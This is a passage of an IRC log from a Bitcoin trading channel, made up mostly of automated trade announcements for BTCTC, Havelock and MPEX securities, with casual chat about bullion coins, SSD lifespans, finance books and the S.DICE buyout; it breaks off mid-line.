[BTCTC] [AMC-PT] 120 @ 0.00369 = 0.4428 BTC [-] Jul 22 18:36:53 [BTCTC] [AMC-PT] 25 @ 0.003661 = 0.0915 BTC [-] Jul 22 18:36:55 [BTCTC] [AMC-PT] 50 @ 0.00366 = 0.183 BTC [-] Jul 22 18:36:55 100g bars are fine Jul 22 18:36:55 [BTCTC] [AMC-PT] 645 @ 0.00365 = 2.3543 BTC [-] Jul 22 18:37:06 but coins are better Jul 22 18:37:18 get the 20 franc rooster and vreneli's too Jul 22 18:37:21 k, coins are better as long as you don't pay too much over spot Jul 22 18:37:31 [HAVELOCK] [HIM] 1 @ 0.25 BTC [-] Jul 22 18:37:32 they are very liquid and easy to sell anywhere in the world Jul 22 18:37:38 yea Jul 22 18:37:46 4% over spot is normal Jul 22 18:37:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.04599 = 0.092 BTC [-] Jul 22 18:37:54 that depends on the coins Jul 22 18:38:01 the 20 franc's are 100 years old Jul 22 18:38:02 [HAVELOCK] [HIM] 1 @ 0.25 BTC [-] Jul 22 18:38:04 [HAVELOCK] [VTX] 1 @ 0.474 BTC [-] Jul 22 18:38:04 they are 90% Jul 22 18:38:10 aha Jul 22 18:38:15 [HAVELOCK] [VTX] 12 @ 0.473 = 5.676 BTC [-] Jul 22 18:38:16 that makes no difference Jul 22 18:38:24 if the coin is 900 or 9999 Jul 22 18:38:24 one last question, is it still counterfeiting if you copy other countries coins? Jul 22 18:38:25 really Jul 22 18:38:33 all coins are differennt Jul 22 18:38:39 krugs are just fine Jul 22 18:38:40 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003838 = 0.3838 BTC [+] Jul 22 18:38:44 always liquid Jul 22 18:38:55 so let's say i had one krug, and a ton of maple leafs Jul 22 18:39:08 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003839 = 0.3839 BTC [+] Jul 22 18:39:08 oh, why not Jul 22 18:39:09 could you make a mold and then make the other coin? Jul 22 18:39:10 [MPEX] [S.MPOE] 900 @ 0.00080782 = 0.727 BTC [-] Jul 22 18:39:19 right Jul 22 18:39:28 the asians have slightly different tastes Jul 22 18:39:38 well anyways Jul 22 18:39:43 lunars are 9999 Jul 22 18:39:55 for ex, the 2009 lunar Ox Jul 22 18:39:55 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.0038 = 1.9 BTC [-] Jul 22 18:40:11 might be trading for 1800 EUR on ebay today Jul 22 18:40:22 because it's limited to 30000 mintage Jul 22 18:40:33 even though it sold at bullion prices in 2009 Jul 22 18:40:53 that's one reason to get lunars Jul 22 18:40:57 [BTCTC] [DMS.MINING] 6 @ 0.01489 = 0.0893 BTC [-] Jul 22 18:41:04 fractional panda's develope nice premiums as well Jul 22 18:41:06 BTCT.co is editing orderbooks to only allow 4 signifcant digits Jul 22 18:41:14 https://bitcointalk.org/index.php?topic=125629.msg2776705#msg2776705 Jul 22 18:41:21 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Jul 22 18:41:26 E-mails from an Asshole Jul 22 18:41:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.045701 = 0.2742 BTC [-] Jul 22 18:42:03 [BTCTC] [BASIC-MINING] 1 @ 0.521101 BTC [+] Jul 22 18:42:18 [BTCTC] [AMC-PT] 981 @ 0.0038 = 3.7278 BTC [+] Jul 22 18:42:43 [BTCTC] [AMC-PT] 19 @ 0.0038 = 0.0722 BTC [+] Jul 22 18:42:45 [BTCTC] [AMC-PT] 50 @ 0.0038 = 0.19 BTC [+] Jul 22 18:44:08 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0038 = 0.0266 BTC [-] Jul 22 18:44:16 Chaang-Noi silver? Jul 22 18:44:22 [BTCTC] [S.MPOE-PT] 300 @ 0.000835 = 0.2505 BTC [-] Jul 22 18:44:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.045701 = 0.2285 BTC [-] Jul 22 18:44:38 oh Jul 22 18:44:42 very nice Jul 22 18:44:42 [HAVELOCK] [AM1] 4 @ 4.7 = 18.8 BTC [+] Jul 22 18:44:44 [BTCTC] [AMC-PT] 21 @ 0.0039 = 0.0819 BTC [+] Jul 22 18:44:46 [BTCTC] [TAT.VIRTUALMINE] 743 @ 0.0038 = 2.8234 BTC [-] Jul 22 18:44:55 once the mania starts they are gonna go ballistic Jul 22 18:45:09 the chinese will pay anything Jul 22 18:45:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0038 BTC [-] Jul 22 18:45:27 [BTCTC] [AMC-PT] 9 @ 0.0037 = 0.0333 BTC [-] Jul 22 18:45:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.045701 BTC [-] Jul 22 18:45:31 there's a big forum for panda coin traders.. over at.. Jul 22 18:45:37 [BTCTC] [AMC-PT] 359 @ 0.003652 = 1.3111 BTC [-] Jul 22 18:45:44 [BTCTC] [AMC-PT] 10 @ 0.003651 = 0.0365 BTC [-] Jul 22 18:45:46 [BTCTC] [AMC-PT] 238 @ 0.00365 = 0.8687 BTC [-] Jul 22 18:45:47 [BTCTC] [AMC-PT] 471 @ 0.00365 = 1.7192 BTC [-] Jul 22 18:46:02 [BTCTC] [S.MPOE-PT] 55 @ 0.000835 = 0.0459 BTC [-] Jul 22 18:46:13 https://www.livebusinesschat.com/smf/index.php?PHPSESSID=2nc7dmmogeemlpevo9t9tavds2&board=346.0 Jul 22 18:46:19 badon Jul 22 18:46:26 [BTCTC] [AMC-PT] 126 @ 0.00365 = 0.4599 BTC [-] Jul 22 18:46:30 [BTCTC] [COGNITIVE] 1 @ 0.81 BTC [+] Jul 22 18:46:39 anyways Jul 22 18:46:44 [BTCTC] [BASIC-MINING] 2 @ 0.559999 = 1.12 BTC [+] Jul 22 18:46:50 fractional gold panda's are good Jul 22 18:46:55 [BTCTC] [TAT.VIRTUALMINE] 400 @ 0.0038 = 1.52 BTC [-] Jul 22 18:47:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.045701 BTC [-] Jul 22 18:47:24 [BTCTC] [AMC-PT] 126 @ 0.00364 = 0.4586 BTC [-] Jul 22 18:47:36 [BTCTC] [ASICMINER-PT] 1 @ 4.751 BTC [+] Jul 22 18:47:51 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0038 = 0.0266 BTC [-] Jul 22 18:48:13 check out the ebay auctions for chinese silver coins in this thread Jul 22 18:48:21 https://www.livebusinesschat.com/smf/index.php?topic=5405.0 Jul 22 18:48:26 MCC LIST #181 - Contrarian, silver age, opportunistics, slowdown, restrikes etc Jul 22 18:48:47 starting page 2 really Jul 22 18:48:49 [BTCTC] [TAT.VIRTUALMINE] 60 @ 0.0038 = 0.228 BTC [-] Jul 22 18:48:52 [BTCTC] [BASIC-MINING] 5 @ 0.56 = 2.8 BTC [+] Jul 22 18:48:57 you'll se what prices they trade for Jul 22 18:49:31 [BTCTC] [TAT.ASICMINER] 6 @ 0.045701 = 0.2742 BTC [-] Jul 22 18:50:12 yea.. just nice to watch 1Oz silver coins go for $13000 :p Jul 22 18:50:35 [BTCTC] [BASIC-MINING] 3 @ 0.559999 = 1.68 BTC [-] Jul 22 18:50:36 [BTCTC] [BASIC-MINING] 2 @ 0.56 = 1.12 BTC [+] Jul 22 18:51:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0457 BTC [-] Jul 22 18:51:26 [BTCTC] [BASIC-MINING] 1 @ 0.56 BTC [+] Jul 22 18:51:40 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.0038 = 0.0342 BTC [-] Jul 22 18:52:29 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.0038 = 0.304 BTC [-] Jul 22 18:53:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.045676 = 0.2284 BTC [-] Jul 22 18:53:21 gold and silver are both up Jul 22 18:53:31 maybe the manipulators are tired out? Jul 22 18:53:48 [BTCTC] [TAT.ASICMINER] 6 @ 0.045675 = 0.2741 BTC [-] Jul 22 18:54:24 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0038 = 0.076 BTC [-] Jul 22 18:54:36 [BTCTC] [TAT.VIRTUALMINE] 130 @ 0.0038 = 0.494 BTC [-] Jul 22 18:55:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.045701 = 0.1371 BTC [+] Jul 22 18:55:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0457 BTC [-] Jul 22 18:56:24 [BTCTC] [TAT.VIRTUALMINE] 44 @ 0.0038 = 0.1672 BTC [-] Jul 22 18:56:25 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.0038 = 0.0228 BTC [-] Jul 22 18:56:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.045674 = 0.2284 BTC [-] Jul 22 18:57:12 [BTCTC] [TAT.VIRTUALMINE] 60 @ 0.0038 = 0.228 BTC [-] Jul 22 18:57:28 [BTCTC] [BITVPS] 1 @ 0.00205 BTC [+] Jul 22 18:57:32 ''bcstats Jul 22 18:57:40 &bcstats Jul 22 18:57:40 [BTCTC] [TAT.ASICMINER] 18 @ 0.045601 = 0.8208 BTC [-] Jul 22 18:57:43 Current Blocks: 247951 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 16 blocks | Next Difficulty In About: 2 hours and 37 seconds | Next Difficulty Estimate: 31203736.2516 | Estimated Percent Change: 19.26723 Jul 22 18:57:43 lol Jul 22 18:57:46 ;;bcstats Jul 22 18:57:48 Current Blocks: 247951 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 16 blocks | Next Difficulty In About: 2 hours and 37 seconds | Next Difficulty Estimate: 31203736.2516 | Estimated Percent Change: 19.26723 Jul 22 18:57:51 & used to work Jul 22 18:57:51 Error: "used" is not a valid command. Jul 22 18:57:55 lol Jul 22 18:57:59 [BTCTC] [TAT.ASICMINER] 8 @ 0.0456 = 0.3648 BTC [-] Jul 22 18:58:20 [BTCTC] [AMC-PT] 100 @ 0.00384 = 0.384 BTC [+] Jul 22 18:58:28 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.0038 = 1.14 BTC [-] Jul 22 18:58:49 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.0038 = 0.0456 BTC [-] Jul 22 18:58:58 ¿bcstats Jul 22 18:59:14 @bcstats Jul 22 18:59:37 [BTCTC] [BASIC-MINING] 3 @ 0.559999 = 1.68 BTC [-] Jul 22 18:59:39 [BTCTC] [BASIC-MINING] 1 @ 0.56 BTC [+] Jul 22 18:59:42 [BTCTC] [BASIC-MINING] 5 @ 0.56 = 2.8 BTC [+] Jul 22 18:59:43 ‡bcstats Jul 22 18:59:55 ❤bcstats Jul 22 18:59:56 I still haven't added a btc sign on my keyboard layout Jul 22 19:00:16 ☭ bcstats Jul 22 19:00:35 I have ฿ on compose but it's not the "best" btc one right? Jul 22 19:00:39 [BTCTC] [BASIC-MINING] 25 @ 0.56 = 14 BTC [+] Jul 22 19:01:01 [BTCTC] [DMS.SELLING] 1 @ 0.0255 BTC [+] Jul 22 19:01:14 Scrat: 卍 Jul 22 19:02:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.04599 = 0.092 BTC [+] Jul 22 19:02:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.045997 = 0.46 BTC [+] Jul 22 19:02:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.046 = 0.368 BTC [+] Jul 22 19:03:09 卍卍rate pankkake 10 geil Jul 22 19:03:27 ツ Jul 22 19:04:27 [HAVELOCK] [AM100] 27 @ 0.044 = 1.188 BTC [-] Jul 22 19:04:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.045601 = 0.6384 BTC [-] Jul 22 19:04:37 [BTCTC] [BASIC-MINING] 5 @ 0.6 = 3 BTC [+] Jul 22 19:04:39 [BTCTC] [TAT.ASICMINER] 28 @ 0.0456 = 1.2768 BTC [-] Jul 22 19:05:02 [BTCTC] [BASIC-MINING] 5 @ 0.6 = 3 BTC [+] Jul 22 19:05:38 [BTCTC] [AMC-PT] 40 @ 0.003849 = 0.154 BTC [+] Jul 22 19:07:01 [BTCTC] [AMC-PT] 60 @ 0.003849 = 0.2309 BTC [+] Jul 22 19:08:09 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [+] Jul 22 19:08:27 [BTCTC] [AMC-PT] 4 @ 0.00385 = 0.0154 BTC [+] Jul 22 19:08:45 [BTCTC] [ASICMINER-PT] 1 @ 4.74 BTC [-] Jul 22 19:09:20 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [+] Jul 22 19:09:24 [BTCTC] [BTC-TRADING-PT] 1 @ 0.93001 BTC [-] Jul 22 19:09:28 [BTCTC] [BTC-TRADING-PT] 1 @ 0.875 BTC [-] Jul 22 19:09:32 [BTCTC] [BTC-TRADING-PT] 1 @ 0.875 BTC [-] Jul 22 19:10:51 [BTCTC] [ASICMINER-PT] 4 @ 4.7 = 18.8 BTC [-] Jul 22 19:11:23 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [+] Jul 22 19:11:58 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 22 19:12:02 [BTCTC] [BASIC-MINING] 6 @ 0.6 = 3.6 BTC [+] Jul 22 19:12:26 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [+] Jul 22 19:13:57 blame litecoin Jul 22 19:16:30 [BTCTC] [BTC-TRADING-PT] 3 @ 0.8557 = 2.5671 BTC [-] Jul 22 19:16:46 [BTCTC] [BASIC-MINING] 5 @ 0.6 = 3 BTC [+] Jul 22 19:16:48 I want a real home audio/video btc store to pop up Jul 22 19:17:03 I would do it myself, but I don't have time to run an online store anymore. Jul 22 19:17:47 [BTCTC] [ASICMINER-PT] 1 @ 4.738 BTC [+] Jul 22 19:18:10 [BTCTC] [TAT.VIRTUALMINE] 24 @ 0.00378 = 0.0907 BTC [-] Jul 22 19:19:18 [BTCTC] [ASICMINER-PT] 1 @ 4.738 BTC [+] Jul 22 19:19:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.046 = 0.092 BTC [+] Jul 22 19:20:34 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00378 = 0.0076 BTC [-] Jul 22 19:22:33 [BTCTC] [AMC-PT] 360 @ 0.0038 = 1.368 BTC [-] Jul 22 19:22:35 [BTCTC] [AMC-PT] 1640 @ 0.00385 = 6.314 BTC [+] Jul 22 19:22:45 [BTCTC] [BASIC-MINING] 1 @ 0.6439 BTC [+] Jul 22 19:25:41 [BTCTC] [AMC-PT] 4 @ 0.00385 = 0.0154 BTC [+] Jul 22 19:25:43 [BTCTC] [AMC-PT] 20 @ 0.003899 = 0.078 BTC [+] Jul 22 19:27:35 [MPEX] [S.MPOE] 5702 @ 0.00080782 = 4.6062 BTC [-] Jul 22 19:27:37 [MPEX] [S.MPOE] 1998 @ 0.00081064 = 1.6197 BTC [+] Jul 22 19:27:39 [BTCTC] [COGNITIVE] 1 @ 0.819944 BTC [+] Jul 22 19:28:52 [BTCTC] [BTC-TRADING-PT] 3 @ 0.8557 = 2.5671 BTC [-] Jul 22 19:30:43 [BTCTC] [RSM] 3 @ 0.016889 = 0.0507 BTC [-] Jul 22 19:30:49 [BTCTC] [RSM] 20 @ 0.016689 = 0.3338 BTC [-] Jul 22 19:31:16 [BTCTC] [BFMINES] 100 @ 0.003999 = 0.3999 BTC [-] Jul 22 19:31:18 [BTCTC] [RSM] 60 @ 0.0164 = 0.984 BTC [-] Jul 22 19:31:45 [BTCTC] [RSM] 50 @ 0.016137 = 0.8069 BTC [-] Jul 22 19:32:04 [BTCTC] [RSM] 1 @ 0.015816 BTC [-] Jul 22 19:32:10 [BTCTC] [RSM] 14 @ 0.015172 = 0.2124 BTC [-] Jul 22 19:32:29 [BTCTC] [RSM] 100 @ 0.0141 = 1.41 BTC [-] Jul 22 19:32:31 [BTCTC] [RSM] 100 @ 0.014 = 1.4 BTC [-] Jul 22 19:32:33 [BTCTC] [RSM] 1 @ 0.013 BTC [-] Jul 22 19:32:34 [BTCTC] [RSM] 100 @ 0.013 = 1.3 BTC [-] Jul 22 19:32:35 [BTCTC] [RSM] 100 @ 0.012504 = 1.2504 BTC [-] Jul 22 19:32:44 [BTCTC] [DMS.SELLING] 3 @ 0.02559 = 0.0768 BTC [+] Jul 22 19:33:22 [BTCTC] [AMC-PT] 72 @ 0.00399 = 0.2873 BTC [+] Jul 22 19:33:24 [BTCTC] [AMC-PT] 19 @ 0.003999 = 0.076 BTC [+] Jul 22 19:33:26 [BTCTC] [AMC-PT] 1000 @ 0.004 = 4 BTC [+] Jul 22 19:33:28 [BTCTC] [AMC-PT] 100 @ 0.004 = 0.4 BTC [+] Jul 22 19:33:30 [BTCTC] [AMC-PT] 2000 @ 0.004 = 8 BTC [+] Jul 22 19:33:31 There we go Jul 22 19:35:03 [BTCTC] [AMC-PT] 169 @ 0.003999 = 0.6758 BTC [-] Jul 22 19:35:05 [BTCTC] [BASIC-MINING] 2 @ 0.643889 = 1.2878 BTC [-] Jul 22 19:35:06 [BTCTC] [AMC-PT] 40 @ 0.004001 = 0.16 BTC [+] Jul 22 19:35:07 [BTCTC] [AMC-PT] 444 @ 0.004088 = 1.8151 BTC [+] Jul 22 19:35:08 [BTCTC] [AMC-PT] 50 @ 0.004089 = 0.2045 BTC [+] Jul 22 19:35:10 [BTCTC] [AMC-PT] 1297 @ 0.00409 = 5.3047 BTC [+] Jul 22 19:37:07 [BTCTC] [AMC-PT] 25 @ 0.004 = 0.1 BTC [-] Jul 22 19:37:11 [BTCTC] [BFMINES] 10 @ 0.004 = 0.04 BTC [+] Jul 22 19:37:39 [BTCTC] [DMS.SELLING] 4 @ 0.02559 = 0.1024 BTC [+] Jul 22 19:38:34 [BTCTC] [DMS.PURCHASE] 15 @ 0.039422 = 0.5913 BTC [-] Jul 22 19:42:08 [BTCTC] [AMC-PT] 11 @ 0.004 = 0.044 BTC [-] Jul 22 19:42:43 [BTCTC] [RSM] 30 @ 0.01278 = 0.3834 BTC [+] Jul 22 19:42:45 [BTCTC] [RSM] 100 @ 0.0125 = 1.25 BTC [-] Jul 22 19:43:08 [BTCTC] [AMC-PT] 414 @ 0.004 = 1.656 BTC [-] Jul 22 19:43:09 [BTCTC] [AMC-PT] 100 @ 0.004 = 0.4 BTC [-] Jul 22 19:43:37 [BTCTC] [DMS.MINING] 2 @ 0.01489 = 0.0298 BTC [-] Jul 22 19:43:59 [BTCTC] [AMC-PT] 1703 @ 0.00409 = 6.9653 BTC [+] Jul 22 19:44:01 [BTCTC] [AMC-PT] 100 @ 0.0041 = 0.41 BTC [+] Jul 22 19:44:02 [BTCTC] [AMC-PT] 1000 @ 0.00414 = 4.14 BTC [+] Jul 22 19:44:17 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00378 = 0.0151 BTC [-] Jul 22 19:44:52 [BTCTC] [AMC-PT] 1111 @ 0.0041 = 4.5551 BTC [-] Jul 22 19:46:08 [BTCTC] [AMC-PT] 710 @ 0.004144 = 2.9422 BTC [+] Jul 22 19:46:55 [BTCTC] [AMC-PT] 2290 @ 0.004144 = 9.4898 BTC [+] Jul 22 19:46:57 [BTCTC] [AMC-PT] 710 @ 0.00415 = 2.9465 BTC [+] Jul 22 19:47:24 [BTCTC] [AMC-PT] 800 @ 0.004144 = 3.3152 BTC [-] Jul 22 19:47:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.045584 = 0.2279 BTC [-] Jul 22 19:48:45 [BTCTC] [BMF] 200 @ 0.0326 = 6.52 BTC [-] Jul 22 19:49:42 [BTCTC] [DMS.PURCHASE] 2 @ 0.039422 = 0.0788 BTC [-] Jul 22 19:51:00 [BTCTC] [BTC-BOND] 200 @ 0.01 = 2 BTC [+] Jul 22 19:51:10 [BTCTC] [AMC-PT] 11 @ 0.004143 = 0.0456 BTC [-] Jul 22 19:51:26 [BTCTC] [AMC-PT] 13 @ 0.004143 = 0.0539 BTC [-] Jul 22 19:51:50 [BTCTC] [AMC-PT] 11 @ 0.00412 = 0.0453 BTC [-] Jul 22 19:52:44 [BTCTC] [AMC-PT] 2900 @ 0.004143 = 12.0147 BTC [+] Jul 22 19:53:08 [BTCTC] [AMC-PT] 50 @ 0.004 = 0.2 BTC [-] Jul 22 19:54:18 [BTCTC] [BTC-BOND] 30 @ 0.01 = 0.3 BTC [+] Jul 22 19:55:32 [BTCTC] [DMS.MINING] 4 @ 0.01489 = 0.0596 BTC [-] Jul 22 19:55:54 [BTCTC] [AMC-PT] 1 @ 0.004055 BTC [+] Jul 22 19:56:41 Ah Jul 22 19:56:54 Well you want to be careful about where you put your games when dealing with an SSD Jul 22 19:57:08 writing and reading over and over again from SSD can shorten it's life span. Jul 22 19:57:12 [MPEX] [S.MPOE] 900 @ 0.00080469 = 0.7242 BTC [-] Jul 22 19:57:14 Rulother_: BS Jul 22 19:57:27 Chaang-Noi: SSDs have a huge impact on game load times, do it Jul 22 19:57:28 That has always been my experience, with earlier SSDs Jul 22 19:57:33 [BTCTC] [DMS.MINING] 18 @ 0.01489 = 0.268 BTC [-] Jul 22 19:57:37 Lifetime Jul 22 19:57:45 I was not refering to load time Jul 22 19:57:48 earlier = 2009? Jul 22 19:58:00 2009-2010 Jul 22 19:58:03 Anyone have any "essentials" recommendations for finance and investing related books? Jul 22 19:58:07 any SSD in the last 3 years does proper write balancing Jul 22 19:58:11 [BTCTC] [AMC-PT] 7 @ 0.004142 = 0.029 BTC [+] Jul 22 19:58:24 Chaang, yes Jul 22 19:58:25 you have to write hundrends terabytes to destroy an ssd nowadays Jul 22 19:59:04 Well that's good to hear. I had Rift/DAoC on my SSD and it made a huge difference. It did also kill an older SSD. I haven't had any problems since Jul 22 19:59:18 [BTCTC] [DMS.MINING] 10 @ 0.0149 = 0.149 BTC [+] Jul 22 19:59:18 Chaang-Noi: yup Jul 22 19:59:30 I'm just looking for specific books, not necessarily a curriculum Jul 22 20:00:39 Secrets of the Temple: How the Federal Reserve Runs the Country: William Greider: 9780671675561: Ama Jul 22 20:00:49 thx Jul 22 20:00:52 anyone else? Jul 22 20:02:05 Scrat I believe you just convinced me to purchase another ssd lol Jul 22 20:06:04 [BTCTC] [ASICMINER-PT] 3 @ 4.728999 = 14.187 BTC [-] Jul 22 20:06:06 [BTCTC] [ASICMINER-PT] 1 @ 4.729 BTC [+] Jul 22 20:06:07 [BTCTC] [ASICMINER-PT] 6 @ 4.7295 = 28.377 BTC [+] Jul 22 20:13:59 [BTCTC] [AMC-PT] 4000 @ 0.00385 = 15.4 BTC [-] Jul 22 20:14:01 [BTCTC] [AMC-PT] 345 @ 0.003704 = 1.2779 BTC [-] Jul 22 20:14:02 [BTCTC] [AMC-PT] 345 @ 0.003704 = 1.2779 BTC [-] Jul 22 20:14:03 [BTCTC] [AMC-PT] 50 @ 0.003703 = 0.1852 BTC [-] Jul 22 20:14:05 [BTCTC] [AMC-PT] 140 @ 0.003703 = 0.5184 BTC [-] Jul 22 20:14:06 [BTCTC] [AMC-PT] 500 @ 0.003703 = 1.8515 BTC [-] Jul 22 20:14:08 [BTCTC] [AMC-PT] 2050 @ 0.003702 = 7.5891 BTC [-] Jul 22 20:14:09 [BTCTC] [AMC-PT] 1400 @ 0.0037 = 5.18 BTC [-] Jul 22 20:14:15 bitch Jul 22 20:15:29 [BTCTC] [AMC-PT] 1 @ 0.0041 BTC [+] Jul 22 20:15:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.045989 = 0.138 BTC [+] Jul 22 20:15:47 [BTCTC] [AMC-PT] 5 @ 0.004 = 0.02 BTC [-] Jul 22 20:15:59 [BTCTC] [AMC-PT] 1 @ 0.004134 BTC [+] Jul 22 20:16:18 who? :D Jul 22 20:16:42 those amc sellers? Jul 22 20:17:02 yeah Jul 22 20:17:08 Getting so cheap on me Jul 22 20:18:31 [BTCTC] [AMC-PT] 375 @ 0.00368 = 1.38 BTC [-] Jul 22 20:18:46 [BTCTC] [BASIC-MINING] 1 @ 0.643889 BTC [-] Jul 22 20:18:57 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00375 = 0.0113 BTC [-] Jul 22 20:19:18 later Jul 22 20:19:27 [HAVELOCK] [SDSTM] 2 @ 0.011 = 0.022 BTC [+] Jul 22 20:21:08 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jul 22 20:21:28 [BTCTC] [TAT.VIRTUALMINE] 97 @ 0.00375 = 0.3638 BTC [-] Jul 22 20:21:29 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00378 = 0.0113 BTC [+] Jul 22 20:21:56 [BTCTC] [LTC-ATF.B2] 1 @ 0.010292 BTC [+] Jul 22 20:32:30 [BTCTC] [TAT.ASICMINER] 25 @ 0.045592 = 1.1398 BTC [-] Jul 22 20:32:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.045574 BTC [-] Jul 22 20:32:36 [BTCTC] [TAT.ASICMINER] 32 @ 0.045391 = 1.4525 BTC [-] Jul 22 20:33:07 [BTCTC] [AMC-PT] 1 @ 0.003711 BTC [+] Jul 22 20:33:42 [BTCTC] [AMC-PT] 2 @ 0.00371 = 0.0074 BTC [-] Jul 22 20:33:46 [BTCTC] [AMC-PT] 10 @ 0.0037 = 0.037 BTC [-] Jul 22 20:33:49 [BTCTC] [AMC-PT] 250 @ 0.0037 = 0.925 BTC [-] Jul 22 20:34:12 [MPEX] [S.MPOE] 7300 @ 0.0008044 = 5.8721 BTC [-] Jul 22 20:34:20 [BTCTC] [AMC-PT] 1 @ 0.00368 BTC [-] Jul 22 20:34:59 [BTCTC] [AMC-PT] 124 @ 0.00368 = 0.4563 BTC [-] Jul 22 20:35:36 [BTCTC] [AMC-PT] 50 @ 0.003641 = 0.1821 BTC [-] Jul 22 20:35:38 [BTCTC] [AMC-PT] 50 @ 0.003641 = 0.1821 BTC [-] Jul 22 20:35:39 [BTCTC] [AMC-PT] 50 @ 0.003641 = 0.1821 BTC [-] Jul 22 20:36:29 [BTCTC] [AMC-PT] 100 @ 0.00364 = 0.364 BTC [-] Jul 22 20:37:17 [BTCTC] [AMC-PT] 100 @ 0.003611 = 0.3611 BTC [-] Jul 22 20:37:19 [BTCTC] [AMC-PT] 200 @ 0.00361 = 0.722 BTC [-] Jul 22 20:38:01 [BTCTC] [AMC-PT] 1169 @ 0.003625 = 4.2376 BTC [+] Jul 22 20:38:10 [BTCTC] [AMC-PT] 193 @ 0.003625 = 0.6996 BTC [+] Jul 22 20:38:31 [BTCTC] [AMC-PT] 463 @ 0.003625 = 1.6784 BTC [+] Jul 22 20:39:25 [BTCTC] [AMC-PT] 100 @ 0.003608 = 0.3608 BTC [-] Jul 22 20:39:32 [BTCTC] [AMC-PT] 217 @ 0.003625 = 0.7866 BTC [+] Jul 22 20:41:05 [BTCTC] [AMC-PT] 52 @ 0.003605 = 0.1875 BTC [-] Jul 22 20:41:41 [BTCTC] [BTC-GOLD] 1 @ 0.054 BTC [+] Jul 22 20:41:42 [BTCTC] [AMC-PT] 30 @ 0.003604 = 0.1081 BTC [-] Jul 22 20:41:56 [BTCTC] [BASIC-MINING] 1 @ 0.643889 BTC [-] Jul 22 20:42:03 http://www.xilinx.com/products/technology/ultrascale/index.htm#10961text Jul 22 20:42:05 ultrascale Jul 22 20:42:06 i want this Jul 22 20:42:19 [BTCTC] [AMC-PT] 1 @ 0.0038 BTC [+] Jul 22 20:42:26 okay what happened to s.dice? Jul 22 20:42:31 it got bought out Jul 22 20:42:34 [BTCTC] [AMC-PT] 75 @ 0.003603 = 0.2702 BTC [-] Jul 22 20:42:35 by whom? Jul 22 20:42:39 a private party Jul 22 20:42:47 how much per share? Jul 22 20:42:50 they bought back public shares at 75% markup Jul 22 20:42:54 .0035 Jul 22 20:42:56 yeah Jul 22 20:43:24 the exact number of coins paid for the company was announced Jul 22 20:43:31 nuts Jul 22 20:44:21 yep Jul 22 20:44:38 making anyone who got in at the "bottom" a nice little chunk of change Jul 22 20:45:00 [BTCTC] [COG.F] 1 @ 11.84 BTC [-] Jul 22 20:45:55 does just dice have a no-US policy? Jul 22 20:46:52 what was the bottom? Jul 22 20:47:07 around .002 Jul 22 20:47:19 in that range, and don't take my decimals as facts Jul 22 20:47:21 i don't remember Jul 22 20:48:57 the lowest buy bid was 0.002 but there were sells around 0.0027 or something if i remember Jul 22 20:49:16 sorry i mean the highest buy bid was 0.002 Jul 22 20:49:57 i was in for 300btc, got 200 out. better than what i expected at least Jul 22 20:50:36 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [-] Jul 22 20:50:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [-] Jul 22 20:50:55 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.0037 = 0.333 BTC [-] Jul 22 20:51:16 [BTCTC] [PAJKA.BOND] 1 @ 0.04699 BTC [+] Jul 22 20:51:34 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [+] Jul 22 20:52:08 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [+] Jul 22 20:52:08 [BTCTC] [COGNITIVE] 1 @ 0.8 BTC [-] Jul 22 20:52:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [+] Jul 22 20:52:57 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [+] Jul 22 20:53:06 [BTCTC] [AMC-PT] 100 @ 0.003602 = 0.3602 BTC [-] Jul 22 20:53:08 [BTCTC] [AMC-PT] 200 @ 0.0036 = 0.72 BTC [-] Jul 22 20:53:20 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 